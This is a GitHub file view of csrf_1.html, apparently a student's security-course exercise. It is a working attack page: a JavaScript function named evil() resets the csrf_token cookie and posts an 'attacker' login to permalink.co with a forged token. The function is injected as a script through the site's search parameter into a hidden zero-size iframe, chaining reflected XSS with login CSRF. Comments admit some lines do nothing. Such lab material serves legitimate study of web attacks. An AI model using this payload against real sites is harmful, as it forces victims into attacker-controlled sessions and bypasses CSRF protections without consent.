-
Notifications
You must be signed in to change notification settings - Fork 1
/
csrf_1.html
33 lines (30 loc) · 1.15 KB
/
csrf_1.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<html>
<head>
<title></title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
</head>
<body>
<!--Unneeded <iframe width="0" height="0" src="http://permalink.co" frameborder="0" name="myframe" allowfullscreen>
-->
</iframe>
<script>
function evil()
{
document.cookie="csrf_token=0"
$.post("http://permalink.co/login?csrfdefense=1&xssdefense=0", {username: "attacker", password: "l33th4x", csrf_token: "0"}
);
}
var link = "http://permalink.co/search?q=" + "<script" + ">" + encodeURIComponent(evil.toString()+";evil();</script" + ">");
// $('<iframe>',
// {
// src: link+"",
// id: 'myframe',
// frameborder: 0,
// }); This doesn't work
//the goal was to make an iframe with this link. making it in js made it so that we could actually use our link since i dont think html liked it very much.
$("html").html("<iframe width=\"0\" height = \"0\" frameborder = \"0\" id=\"myframe\" src=\"" + link + "\"></iframe>");
document.forms['myframe'].submit(); // i dont think this does anything
// document.forms['myform'].submit();
</script>
</body>
</html>